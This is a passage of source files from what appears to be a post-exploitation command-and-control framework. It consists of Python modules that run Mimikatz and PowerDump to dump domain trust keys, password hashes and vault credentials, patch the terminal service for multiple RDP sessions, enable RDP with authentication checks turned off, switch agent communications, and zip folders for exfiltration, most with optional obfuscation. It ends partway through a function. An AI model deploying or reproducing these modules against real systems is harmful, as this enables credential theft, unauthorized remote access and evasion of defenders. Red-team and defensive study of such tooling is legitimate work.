37 |             'Agent' : {
38 |                 'Description'   :   'Agent to run module on.',
39 |                 'Required'      :   True,
40 |                 'Value'         :   ''
41 |             },
42 |             'Method' : {
43 |                 'Description'   :   'Method to extract keys ("sekurlsa" or "lsadump")',
44 |                 'Required'      :   True,
45 |                 'Value'         :   'lsadump'
46 |             }
47 |         }
48 | 
49 |         # save off a copy of the mainMenu object to access external functionality
50 |         #   like listeners/agent handlers/etc.
51 |         self.mainMenu = mainMenu
52 |         
53 |         for param in params:
54 |             # parameter format is [Name, Value]
55 |             option, value = param
56 |             if option in self.options:
57 |                 self.options[option]['Value'] = value
58 | 
59 | 
60 |     def generate(self, obfuscate=False, obfuscationCommand=""):
61 |         
62 |         # read in the common module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
64 |         if obfuscate:
65 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
66 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
67 |         try:
68 |             f = open(moduleSource, 'r')
69 |         except:
70 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
71 |             return ""
72 | 
73 |         moduleCode = f.read()
74 |         f.close()
75 | 
76 |         script = moduleCode
77 |         scriptEnd = ""
78 |         if self.options['Method']['Value'].lower() == "sekurlsa":
79 |             scriptEnd += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
80 |         else:
81 |             scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
82 |         if obfuscate:
83 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
84 |         script += scriptEnd
85 |         return script
86 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/powerdump.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-PowerDump',
 9 | 
10 |             'Author': ['DarkOperator', 'winfang', 'Kathy Peters', 'ReL1K'],
11 | 
12 |             'Description': "Dumps hashes from the local system using Posh-SecMod's Invoke-PowerDump",
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : True,
19 | 
20 |             'OpsecSafe' : True,
21 | 
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 | 
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 |         
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 |         
55 |         # read in the common module source code
56 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-PowerDump.ps1"
57 |         if obfuscate:
58 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
59 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
60 |         try:
61 |             f = open(moduleSource, 'r')
62 |         except:
63 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
64 |             return ""
65 | 
66 |         moduleCode = f.read()
67 |         f.close()
68 | 
69 |         script = moduleCode
70 | 
71 |         scriptEnd = "Invoke-PowerDump"
72 |         if obfuscate:
73 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
74 |         script += scriptEnd
75 |         return script
76 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/vault_credential.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-VaultCredential',
 9 | 
10 |             'Author': ['@mattifestation'],
11 | 
12 |             'Description': ("Runs PowerSploit's Get-VaultCredential to display "
13 |                             "Windows vault credential objects including "
14 |                             "cleartext web credentials."),
15 | 
16 |             'Background' : True,
17 | 
18 |             'OutputExtension' : None,
19 |             
20 |             'NeedsAdmin' : True,
21 | 
22 |             'OpsecSafe' : True,
23 | 
24 |             'Language' : 'powershell',
25 | 
26 |             'MinLanguageVersion' : '2',
27 |             
28 |             'Comments': [
29 |                 'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1'
30 |             ]
31 |         }
32 | 
33 |         # any options needed by the module, settable during runtime
34 |         self.options = {
35 |             # format:
36 |             #   value_name : {description, required, default_value}
37 |             'Agent' : {
38 |                 'Description'   :   'Agent to run module on.',
39 |                 'Required'      :   True,
40 |                 'Value'         :   ''
41 |             }
42 |         }
43 | 
44 |         # save off a copy of the mainMenu object to access external functionality
45 |         #   like listeners/agent handlers/etc.
46 |         self.mainMenu = mainMenu
47 | 
48 |         for param in params:
49 |             # parameter format is [Name, Value]
50 |             option, value = param
51 |             if option in self.options:
52 |                 self.options[option]['Value'] = value
53 | 
54 | 
55 |     def generate(self, obfuscate=False, obfuscationCommand=""):
56 |         
57 |         # read in the common module source code
58 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Get-VaultCredential.ps1"
59 |         if obfuscate:
60 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
61 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         moduleCode = f.read()
69 |         f.close()
70 | 
71 |         script = moduleCode
72 | 
73 |         
74 |         scriptEnd = "Get-VaultCredential"
75 |         if obfuscate:
76 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
77 |         script += scriptEnd
78 |         return script
79 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/disable_rdp.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Disable-RDP',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Disables RDP on the remote machine."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : True,
19 | 
20 |             'OpsecSafe' : False,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [ ]
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             }
38 |         }
39 | 
40 |         # save off a copy of the mainMenu object to access external functionality
41 |         #   like listeners/agent handlers/etc.
42 |         self.mainMenu = mainMenu
43 | 
44 |         for param in params:
45 |             # parameter format is [Name, Value]
46 |             option, value = param
47 |             if option in self.options:
48 |                 self.options[option]['Value'] = value
49 | 
50 | 
51 |     def generate(self, obfuscate=False, obfuscationCommand=""):
52 |         
53 |         # command to disable RDP
54 |         script = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f;"
55 |         # command to enable NLA only if the enable runs successfully
56 |         script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"
57 |         if obfuscate:
58 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
59 |         return script
60 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/enable_multi_rdp.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz Multirdp',
 9 | 
10 |             'Author': ['@gentilkiwi', '@JosephBialek'],
11 | 
12 |             'Description': ("[!] WARNING: Experimental! Runs PowerSploit's Invoke-Mimikatz "
13 |                             "function to patch the Windows terminal service to allow "
14 |                             "multiple users to establish simultaneous RDP connections."),
15 | 
16 |             'Background' : True,
17 | 
18 |             'OutputExtension' : None,
19 |             
20 |             'NeedsAdmin' : True,
21 | 
22 |             'OpsecSafe' : False,
23 | 
24 |             'Language' : 'powershell',
25 | 
26 |             'MinLanguageVersion' : '2',
27 |             
28 |             'Comments': [
29 |                 'http://blog.gentilkiwi.com',
30 |                 'http://clymb3r.wordpress.com/'
31 |             ]
32 |         }
33 | 
34 |         # any options needed by the module, settable during runtime
35 |         self.options = {
36 |             # format:
37 |             #   value_name : {description, required, default_value}
38 |             'Agent' : {
39 |                 'Description'   :   'Agent to run module on.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         # read in the common module source code
59 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
60 |         if obfuscate:
61 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
62 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
63 |         try:
64 |             f = open(moduleSource, 'r')
65 |         except:
66 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
67 |             return ""
68 | 
69 |         moduleCode = f.read()
70 |         f.close()
71 | 
72 |         script = moduleCode
73 | 
74 |         scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
75 |         if obfuscate:
76 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
77 |         script += scriptEnd
78 |         return script
79 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/enable_rdp.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Enable-RDP',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Enables RDP on the remote machine and adds a firewall exception."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : True,
19 | 
20 |             'OpsecSafe' : False,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [ ]
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             }
38 |         }
39 | 
40 |         # save off a copy of the mainMenu object to access external functionality
41 |         #   like listeners/agent handlers/etc.
42 |         self.mainMenu = mainMenu
43 | 
44 |         for param in params:
45 |             # parameter format is [Name, Value]
46 |             option, value = param
47 |             if option in self.options:
48 |                 self.options[option]['Value'] = value
49 | 
50 | 
51 |     def generate(self, obfuscate=False, obfuscationCommand=""):
52 |         
53 |         # command to enable RDP
54 |         script = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f;"
55 |         # command to add the firewall exception only if the enable runs successfully
56 |         script += " if($?) {$null = netsh firewall set service type = remotedesktop mod = enable;"
57 |         # command to disable NLA
58 |         script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }"
59 |         if obfuscate:
60 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
61 |         return script
62 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/get_domain_sid.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-DomainSID',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Returns the SID for the current of specified domain.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [ ]
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             },
38 |             'Domain' : {
39 |                 'Description'   :   'Domain to resolve SID for, defaults to the current domain.',
40 |                 'Required'      :   False,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 | 
58 |         moduleName = self.info["Name"]
59 |         
60 |         # read in the common powerview.ps1 module source code
61 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         moduleCode = f.read()
69 |         f.close()
70 | 
71 |         # get just the code needed for the specified function
72 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
73 | 
74 |         script += moduleName + " "
75 |         scriptEnd = ""
76 |         for option,values in self.options.iteritems():
77 |             if option.lower() != "agent":
78 |                 if values['Value'] and values['Value'] != '':
79 |                     if values['Value'].lower() == "true":
80 |                         # if we're just adding a switch
81 |                         scriptEnd += " -" + str(option)
82 |                     else:
83 |                         scriptEnd += " -" + str(option) + " " + str(values['Value']) 
84 | 
85 |         scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
86 |         if obfuscate:
87 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
88 |         return script
89 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/invoke_script.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Script',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Run a custom script. Useful for mass-taskings or script autoruns.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 | 
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': []
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             },
38 |             'ScriptPath' : {
39 |                 'Description'   :   'Full path to the PowerShell script.ps1 to run (on attacker machine)',
40 |                 'Required'      :   False,
41 |                 'Value'         :   ''
42 |             },
43 |             'ScriptCmd' : {
44 |                 'Description'   :   'Script command (Invoke-X) from file to run, along with any specified arguments.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 | 
54 |         for param in params:
55 |             # parameter format is [Name, Value]
56 |             option, value = param
57 |             if option in self.options:
58 |                 self.options[option]['Value'] = value
59 | 
60 | 
61 |     def generate(self, obfuscate=False, obfuscationCommand=""):
62 |         
63 |         scriptPath = self.options['ScriptPath']['Value']
64 |         scriptCmd = self.options['ScriptCmd']['Value']
65 |         script = ''
66 | 
67 |         if(scriptPath != ''):
68 |             try:
69 |                 f = open(scriptPath, 'r')
70 |             except:
71 |                 print helpers.color("[!] Could not read script source path at: " + str(scriptPath))
72 |                 return ""
73 | 
74 |             script = f.read()
75 |             f.close()
76 |             script += '\n'
77 | 
78 |         script += "%s" %(scriptCmd)
79 |         if obfuscate:
80 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
81 |         return script
82 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/logoff.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Logoff User',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Logs the current user (or all users) off the machine."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : False,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': []
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             },
38 |             'AllUsers' : {
39 |                 'Description'   :   'Switch. Log off all current users.',
40 |                 'Required'      :   False,
41 |                 'Value'         :   ''
42 |             },            
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         allUsers = self.options['AllUsers']['Value']
59 | 
60 |         if allUsers.lower() == "true":
61 |             script = "'Logging off all users.'; Start-Sleep -s 3; $null = (gwmi win32_operatingsystem).Win32Shutdown(4)"
62 |         else:
63 |             script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f"
64 |         if obfuscate:
65 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
66 |         return script
67 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/restart.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Restart-Computer',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Restarts the specified machine."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : False,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': []
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             }
38 |         }
39 | 
40 |         # save off a copy of the mainMenu object to access external functionality
41 |         #   like listeners/agent handlers/etc.
42 |         self.mainMenu = mainMenu
43 |         
44 |         for param in params:
45 |             # parameter format is [Name, Value]
46 |             option, value = param
47 |             if option in self.options:
48 |                 self.options[option]['Value'] = value
49 | 
50 | 
51 |     def generate(self, obfuscate=False, obfuscationCommand=""):
52 |         
53 |         script = "'Restarting computer';Restart-Computer -Force"
54 |         if obfuscate:
55 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
56 |         return script
57 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/sid_to_user.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'SID-to-User',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Converts a specified domain sid to a user."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': []
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             },
38 |             'SID' : {
39 |                 'Description'   :   'Domain SID to translate.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         script = "(New-Object System.Security.Principal.SecurityIdentifier(\"%s\")).Translate( [System.Security.Principal.NTAccount]).Value" %(self.options['SID']['Value'])
59 |         if obfuscate:
60 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
61 |         return script
62 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/switch_listener.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Spawn',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Overwrites the listener controller logic with the agent with the '
13 |                             'logic from generate_comms() for the specified listener.'),
14 | 
15 |             'Background' : False,
16 | 
17 |             'OutputExtension' : None,
18 | 
19 |             'NeedsAdmin' : False,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 | 
27 |             'Comments': []
28 |         }
29 | 
30 |         # any options needed by the module, settable during runtime
31 |         self.options = {
32 |             # format:
33 |             #   value_name : {description, required, default_value}
34 |             'Agent' : {
35 |                 'Description'   :   'Agent to run module on.',
36 |                 'Required'      :   True,
37 |                 'Value'         :   ''
38 |             },
39 |             'Listener' : {
40 |                 'Description'   :   'Listener to switch agent comms to.',
41 |                 'Required'      :   True,
42 |                 'Value'         :   ''
43 |             }
44 |         }
45 | 
46 |         # save off a copy of the mainMenu object to access external functionality
47 |         #   like listeners/agent handlers/etc.
48 |         self.mainMenu = mainMenu
49 | 
50 |         for param in params:
51 |             # parameter format is [Name, Value]
52 |             option, value = param
53 |             if option in self.options:
54 |                 self.options[option]['Value'] = value
55 | 
56 | 
57 |     def generate(self, obfuscate=False, obfuscationCommand=""):
58 | 
59 |         # extract all of our options
60 |         listenerName = self.options['Listener']['Value']
61 | 
62 |         if listenerName not in self.mainMenu.listeners.activeListeners:
63 |             print helpers.color("[!] Listener '%s' doesn't exist!" % (listenerName))
64 |             return ''
65 | 
66 |         activeListener = self.mainMenu.listeners.activeListeners[listenerName]
67 |         listenerOptions = activeListener['options']
68 | 
69 |         commsCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_comms(listenerOptions=listenerOptions, language='powershell')
70 | 
71 |         # signal the existing listener that we're switching listeners, and the new comms code
72 |         commsCode = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listenerName, commsCode)
73 |         if obfuscate:
74 |             commsCode = helpers.obfuscate(self.mainMenu.installPath, psScript=commsCode, obfuscationCommand=obfuscationCommand)
75 |         return commsCode
76 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/user_to_sid.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'User-to-SID',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Converts a specified domain\\user to a domain sid."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': []
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             },
38 |             'Domain' : {
39 |                 'Description'   :   'Domain name for translation.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             },
43 |             'User' : {
44 |                 'Description'   :   'Username for translation.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 |         
54 |         for param in params:
55 |             # parameter format is [Name, Value]
56 |             option, value = param
57 |             if option in self.options:
58 |                 self.options[option]['Value'] = value
59 | 
60 | 
61 |     def generate(self, obfuscate=False, obfuscationCommand=""):
62 |         
63 |         script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" %(self.options['Domain']['Value'], self.options['User']['Value'])
64 |    
65 |         if obfuscate:
66 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
67 |         return script
68 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/management/zipfolder.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-ZipFolder',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Zips up a target folder for later exfiltration.'),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 | 
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': []
27 |         }
28 | 
29 |         # any options needed by the module, settable during runtime
30 |         self.options = {
31 |             # format:
32 |             #   value_name : {description, required, default_value}
33 |             'Agent' : {
34 |                 'Description'   :   'Agent to run module on.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             },
38 |             'Folder' : {
39 |                 'Description'   :   'Folder path to zip.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''                
42 |             },
43 |             'ZipFileName' : {
44 |                 'Description'   :   'Zip name/path to create.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''                
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 | 
54 |         for param in params:
55 |             # parameter format is [Name, Value]
56 |             option, value = param
57 |             if option in self.options:
58 |                 self.options[option]['Value'] = value
59 | 
60 | 
61 |     def generate(self, obfuscate=False, obfuscationCommand=""):
62 |         
63 |         script = """
64 | function Invoke-ZipFolder
65 | {
66 |     param([string]$Folder, [string]$ZipFileName)
67 | 
68 |     if (-not (Test-Path $Folder)) {
69 |         "Target folder $Folder doesn't exist."
70 |         return
71 |     }
72 | 
73 |     if (test-path $ZipFileName) { 
74 |         "Zip file already exists at $ZipFileName"
75 |         return
76 |     }
77 | 
78 |     $Directory = Get-Item $Folder
79 | 
